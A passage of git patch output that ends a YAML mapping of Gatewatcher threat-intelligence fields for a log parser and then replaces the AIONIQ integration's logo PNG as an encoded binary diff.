+          gatewatcher.ioc_tags: '{{json_load.message.ioc_tags}}'
+          gatewatcher.ioc_type: '{{json_load.message.ioc_type}}'
+          gatewatcher.campaigns: '{{json_load.message.campaigns}}'
+          gatewatcher.ioc_value: '{{json_load.message.ioc_value}}'
+          gatewatcher.meta_data: '{{json_load.message.meta_data}}'
+          gatewatcher.relations: '{{json_load.message.relations}}'
+          gatewatcher.signature: '{{json_load.message.signature}}'
+          gatewatcher.categories: '{{json_load.message.categories}}'
+          gatewatcher.usage_mode: '{{json_load.message.usage_mode}}'
+          gatewatcher.description: '{{json_load.message.description}}'
+          gatewatcher.probability: '{{json_load.message.probability}}'
+          gatewatcher.threat_actor: '{{json_load.message.threat_actor}}'
+          gatewatcher.matched_event: '{{json_load.message.matched_event}}'
+          gatewatcher.external_links: '{{json_load.message.external_links}}'
+          gatewatcher.vulnerabilities: '{{json_load.message.vulnerabilities}}'
+          gatewatcher.ioc_updated_date: '{{json_load.message.ioc_updated_date}}'
+          gatewatcher.targeted_sectors: '{{json_load.message.targeted_sectors}}'
+          gatewatcher.ioc_creation_date: '{{json_load.message.ioc_creation_date}}'
+          gatewatcher.kill_chain_phases: '{{json_load.message.kill_chain_phases}}'
+          gatewatcher.timestamp_package: '{{json_load.message.timestamp_package}}'
+          gatewatcher.matched_event_type: '{{json_load.message.matched_event_type}}'
+          gatewatcher.targeted_countries: '{{json_load.message.targeted_countries}}'
+          gatewatcher.targeted_platforms: '{{json_load.message.targeted_platforms}}'
+          gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}'
+        filter: ''
+        name: set
+

From bd91e163ea94ffb1b8da95ec96fcbcbc74eb760b Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Wed, 4 Sep 2024 15:43:28 +0200
Subject: [PATCH 003/317] New logo

---
 GateWatcher/aioniq/_meta/logo.png | Bin 20110 -> 16628 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/logo.png b/GateWatcher/aioniq/_meta/logo.png
index 0961df25ca068c6ba4a6d563e52897caec9ac8a4..f8b45a6a754e6f75f7bbb1c2e2d8a40a08c67aae 100644
GIT binary patch
literal 16628
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
